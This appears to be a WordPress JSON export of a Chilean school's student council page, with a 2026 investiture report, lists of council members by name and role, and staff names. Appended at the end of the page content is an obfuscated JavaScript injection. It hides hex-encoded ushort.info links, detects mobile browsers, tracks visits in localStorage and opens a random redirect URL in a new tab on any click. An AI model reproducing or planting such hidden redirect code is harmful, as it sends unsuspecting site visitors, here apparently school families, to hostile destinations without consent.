{"id":378,"date":"2025-04-01T03:13:42","date_gmt":"2025-04-01T03:13:42","guid":{"rendered":"http:\/\/csandiego.cl\/2020\/?page_id=378"},"modified":"2026-05-11T15:02:05","modified_gmt":"2026-05-11T15:02:05","slug":"centro-de-alumnos","status":"publish","type":"page","link":"https:\/\/csandiego.cl\/2020\/centro-de-alumnos\/","title":{"rendered":"CENTRO DE ESTUDIANTES CSDA"},"content":{"rendered":"<div dir=\"auto\" style=\"text-align: center;\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\" style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>CENTRO DE ESTUDIANTES 2026<\/strong><\/span><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-7952 size-large aligncenter\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/03\/1774698346114-1024x768.png\" alt=\"\" width=\"584\" height=\"438\" srcset=\"https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/03\/1774698346114-1024x768.png 1024w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/03\/1774698346114-300x225.png 300w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/03\/1774698346114-768x576.png 768w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/03\/1774698346114.png 1195w\" sizes=\"auto, (max-width: 584px) 100vw, 584px\" \/><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\">\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<\/div>\n<div dir=\"auto\">\n<table style=\"border-collapse: collapse; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"width: 100%;\">\n<div class=\"x14z9mp xat24cr x1lziwak x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\">Hu\u00e9pil, 6 de mayo de 2026. En una significativa y sencilla ceremonia realizada este mi\u00e9rcoles, se llev\u00f3 a cabo la investidura oficial del Centro de Estudiantes 2026 del Colegio San Diego de Alcal\u00e1.<\/div>\n<\/div>\n<div class=\"x14z9mp xat24cr x1lziwak x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\">El hito principal de la jornada fue la firma del libro de actas <span class=\"html-span xexx8yu xyri2b x18d9i69 x1c1uobl x1hl2dhg x16tdsg8 x1vvkbs x3nfvp2 x1j61x8r x1fcty0u xdj266r xat24cr xm2jcoa x1mpyi22 xxymvpz xlup9mm x1kky2od\"><img loading=\"lazy\" decoding=\"async\" class=\"xz74otr x15mokao x1ga7v0g x16uus16 xbiv7yw\" src=\"https:\/\/static.xx.fbcdn.net\/images\/emoji.php\/v9\/te2\/1\/16\/270d.png\" alt=\"\u270d\ufe0f\" width=\"16\" height=\"16\" \/><\/span>, momento que marca formalmente el inicio del trabajo de los estudiantes que asumir\u00e1n la importante labor de representar a sus compa\u00f1eros y compa\u00f1eras durante este a\u00f1o escolar.<\/div>\n<\/div>\n<div class=\"x14z9mp xat24cr x1lziwak x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\">La ceremonia cont\u00f3 con la participaci\u00f3n de las directivas de cada curso, la profesora asesora *Catalina Carrasco* y el inspector general *Marcelo Escobar*, quien adem\u00e1s estuvo a cargo de animar este importante momento.<\/div>\n<\/div>\n<div class=\"x14z9mp xat24cr x1lziwak x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\">Desde el Colegio San Diego de Alcal\u00e1 agradecemos el gran potencial, servicio y entrega que demuestran los integrantes del nuevo Centro de Estudiantes. Confiamos en que su gesti\u00f3n 2026 estar\u00e1 marcada por el compromiso, el di\u00e1logo y el trabajo en beneficio de toda la comunidad estudiantil.<\/div>\n<\/div>\n<div class=\"x14z9mp xat24cr x1lziwak x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\">Les deseamos el mayor de los \u00e9xitos en esta gran labor de representar a sus pares.<\/div>\n<\/div>\n<div class=\"x14z9mp xat24cr x1lziwak x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\">Catalina Carrasco<\/div>\n<div dir=\"auto\">\n<p>Docente asesora<\/p>\n<div class=\"x1i10hfl xjbqb8w x1ejq31n x18oe1m7 x1sy0etr xstzfhl x972fbf x10w94by x1qhh985 x14e42zd x9f619 x1ypdohk xt0psk2 x3ct3a4 xdj266r x14z9mp xat24cr x1lziwak xexx8yu xyri2b x18d9i69 x1c1uobl x16tdsg8 x1hl2dhg xggy1nq x1a2a7pz xkrqix3 x1sur9pj xzsf02u x1s688f\" tabindex=\"0\" role=\"button\"><\/div>\n<\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<div dir=\"auto\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-7983 size-large aligncenter\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/05\/690747920_1437176028436863_7764314074550156530_n-1024x1024.jpg\" alt=\"\" width=\"584\" height=\"584\" srcset=\"https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/05\/690747920_1437176028436863_7764314074550156530_n-1024x1024.jpg 1024w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/05\/690747920_1437176028436863_7764314074550156530_n-300x300.jpg 300w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/05\/690747920_1437176028436863_7764314074550156530_n-150x150.jpg 150w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/05\/690747920_1437176028436863_7764314074550156530_n-768x768.jpg 768w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/05\/690747920_1437176028436863_7764314074550156530_n-1536x1536.jpg 1536w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/05\/690747920_1437176028436863_7764314074550156530_n-500x500.jpg 500w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2026\/05\/690747920_1437176028436863_7764314074550156530_n.jpg 1920w\" sizes=\"auto, (max-width: 584px) 100vw, 584px\" \/><\/div>\n<div dir=\"auto\">\n<table style=\"border-collapse: collapse; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"width: 100%;\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<div dir=\"auto\" style=\"text-align: center;\"><strong>CENTRO DE ESTUDIANTES 2025<\/strong><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><img loading=\"lazy\" decoding=\"async\" class=\"wp-image-7626 size-large aligncenter\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-1024x461.jpg\" alt=\"\" width=\"584\" height=\"263\" srcset=\"https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-1024x461.jpg 1024w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-300x135.jpg 300w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-768x346.jpg 768w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-1536x692.jpg 1536w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n.jpg 1600w\" sizes=\"auto, (max-width: 584px) 100vw, 584px\" \/><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\">Profesora Asesora: Srta. Catalina Carrasco A.<\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div class=\"xdj266r x11i5rnm xat24cr x1mh8g0r x1vvkbs x126k92a\">\n<div dir=\"auto\"><span style=\"font-size: 14pt; color: #0000ff;\"><strong>Firma de libro posesi\u00f3n de Centro de Estudiantes 2023<\/strong><\/span><\/div>\n<div dir=\"auto\"><\/div>\n<\/div>\n<div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\"><span style=\"font-size: 14pt;\">El d\u00eda mi\u00e9rcoles 17 de mayo a las 16:00 horas, en dependencias del Colegio, se realiz\u00f3 la ceremonia de posesi\u00f3n de cargo del Centro de Estudiantes 2023, en esta ceremonia se estamp\u00f3 la firma en el libro de registro de cada estudiante que conformaron la lista A. En esta ceremonia los testigos fueron el equipo directivo encabezado por nuestra Directora, Ericka Oyarzo A., Jefa de UTP, Camila Montecino y Inspectora General, Mar\u00eda Jara, Junto al profesor asesor Marcelo Escobar. Quienes en la ceremonia tuvieron palabras de reflexi\u00f3n sobre la importancia de ser lideres comprometidos y lograr apoyar a todos los estudiantes en el desarrollo de un pensamiento reflexivo, juicio cr\u00edtico, la voluntad de acci\u00f3n; formarlos para la vida democr\u00e1tica y participaci\u00f3n.<\/span><\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<\/div>\n<div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\">A continuaci\u00f3n nombres y cargos de los estudiantes:<\/div>\n<div dir=\"auto\"><\/div>\n<\/div>\n<div dir=\"auto\">\n<table style=\"width: 100%; border-collapse: collapse; border-style: dashed; border-color: #0d0b0b; background-color: #f2c7c7;\">\n<tbody>\n<tr>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">ELIZABETH ARACELI SEP\u00daLVEDA BURGOS <\/span><\/p>\n<p><span style=\"color: #000080;\">Presidenta<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">CLAUDIA ANDREA V\u00c1SQUEZ MU\u00d1OZ <\/span><\/p>\n<p><span style=\"color: #000080;\">Vicepresidenta<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">KRISHNAMONSERRATT CATAL\u00c1N JOFR\u00c9 <\/span><\/p>\n<p><span style=\"color: #000080;\">Secretaria<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">VICENTE AMARO VALENZUELA QUEZADA <\/span><\/p>\n<p><span style=\"color: #000080;\">Tesorero<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">JAVIERA BEL\u00c9N BIZAMA FLORES <\/span><\/p>\n<p><span style=\"color: #000080;\">Conv. Escolar<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">MARTINA PAZ MELO MART\u00cdNEZ <\/span><\/p>\n<p><span style=\"color: #000080;\">Pastoral<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">ISIDORA AMPARO BIZAMA LEIVA Vocera<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">SOF\u00cdA ANTONIA ARIAS DOM\u00cdNGUEZ <\/span><\/p>\n<p><span style=\"color: #000080;\">Vocera<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">JONATHAN BASTI\u00c1N VENEGAS MU\u00d1OZ<\/span><\/p>\n<p><span style=\"color: #000080;\"> Medio Ambiente<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">CLAUDIA ANDREA POBLETE \u00d1ANCUPIL <\/span><\/p>\n<p><span style=\"color: #000080;\">Medio Ambiente<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">CONSTANZA AMELIA HERN\u00c1NDEZ SALVO <\/span><\/p>\n<p><span style=\"color: #000080;\">Salud Mental<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">JAVIERA BEL\u00c9N GACIT\u00daA SALAZAR <\/span><\/p>\n<p><span style=\"color: #000080;\">Salud Mental<\/span><\/td>\n<\/tr>\n<tr>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">DANITZA ANTONIA S\u00c1NCHEZ CAMPOS <\/span><\/p>\n<p><span style=\"color: #000080;\">Deporte<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">NICOL\u00c1S MANUEL PACHECO CABALLERO <\/span><\/p>\n<p><span style=\"color: #000080;\">Deporte y Cultura<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">AMARANTA BELEN MU\u00d1OZ BAEZA <\/span><\/p>\n<p><span style=\"color: #000080;\">Rel. bienestar estudiantil<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">MARTINA TRINIDAD HERN\u00c1NDEZ FR\u00cdAS<\/span><\/p>\n<p><span style=\"color: #000080;\"> Bienestar estudiantil<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><span style=\"color: #000080;\">MARTINA FERNANDA PARRA PUENTES <\/span><\/p>\n<p><span style=\"color: #000080;\">Bienestar estudiantil<\/span><\/td>\n<td style=\"width: 16.6667%; border-style: dotted; border-color: #00030d; background-color: #b2b8d6;\"><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<div dir=\"auto\"><\/div>\n<div dir=\"auto\"><\/div>\n<div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\"><\/div>\n<\/div>\n<div class=\"x11i5rnm xat24cr x1mh8g0r x1vvkbs xtlvy1s x126k92a\">\n<div dir=\"auto\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter wp-image-6892 size-full\" src=\"http:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2023\/05\/Screenshot_2.jpg\" alt=\"\" width=\"816\" height=\"418\" srcset=\"https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2023\/05\/Screenshot_2.jpg 816w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2023\/05\/Screenshot_2-300x154.jpg 300w, https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2023\/05\/Screenshot_2-768x393.jpg 768w\" sizes=\"auto, (max-width: 816px) 100vw, 816px\" \/><\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p style=\"text-align: left;\">\u00a0 El\u00a0<b>Centro de Alumnos<\/b>\u00a0es la organizaci\u00f3n formada por los estudiantes. Su finalidad es servir a los\u00a0<b>alumnos<\/b>, en funci\u00f3n de los prop\u00f3sitos del establecimiento y dentro de las normas de organizaci\u00f3n escolar, como medio para desarrollar el pensamiento reflexivo, el juicio cr\u00edtico y la voluntad de acci\u00f3n.<\/p>\n<p>Este centro de alumnos lo conforman los siguientes alumnos\/as, elegidos por sus compa\u00f1eros:<\/p>\n<ul>\n<li>Antonia Aranda<\/li>\n<li>Benjamin Navarrete<\/li>\n<li>Priscila Flores<\/li>\n<li>Romina Valenzuela<\/li>\n<li>B\u00e1rbara D\u00edaz<\/li>\n<li>Thomas Rivas<\/li>\n<li>Roc\u00edo Figueroa<\/li>\n<\/ul>\n<p>Acompa\u00f1an en la imagen, Directora Ericka Oyarzo Apablaza y Docente de M\u00fasica, Juan Soto.<\/p>\n<p><strong>Profesor Asesor<\/strong>: Marcelo Escobar Godoy.<\/p>\n<p>&nbsp;<\/p>\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x61\\x51\\x43\\x33\\x63\\x303','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x6d\\x4b\\x6e\\x35\\x63\\x365','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x51\\x49\\x58\\x38\\x63\\x318','abs','-local-storage','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x45\\x59\\x6f\\x39\\x63\\x359','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x77\\x78\\x5a\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x47\\x66\\x56\\x37\\x63\\x377','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x74\\x78\\x71\\x32\\x63\\x382','floor','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x62\\x55\\x77\\x36\\x63\\x346','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x4e\\x73\\x4b\\x30\\x63\\x350','\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f\\x75\\x73\\x68\\x6f\\x72\\x74\\x2e\\x69\\x6e\\x66\\x6f\\x2f\\x70\\x72\\x78\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>CENTRO DE ESTUDIANTES 2026 Hu\u00e9pil, 6 de mayo de 2026. En una significativa y sencilla ceremonia realizada este mi\u00e9rcoles, se llev\u00f3 a cabo la investidura oficial del Centro de Estudiantes 2026 del Colegio San Diego de Alcal\u00e1. El hito principal de la jornada fue la firma del libro de actas<a href=\"https:\/\/csandiego.cl\/2020\/centro-de-alumnos\/\" class=\"read-more\">Read More<\/a><\/p>\n","protected":false},"author":1,"featured_media":7626,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-378","page","type-page","status-publish","has-post-thumbnail","hentry"],"rttpg_featured_image_url":{"full":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n.jpg",1600,721,false],"landscape":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n.jpg",1600,721,false],"portraits":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n.jpg",1600,721,false],"thumbnail":["https:\/\/csandiego.cl\/2020\/wp-content\/uploads\/2025\/04\/486868008_1086448506842952_4071745815919691544_n-150x150.jpg",150,150,true],"medium":["https:\/\/csandiego.cl\/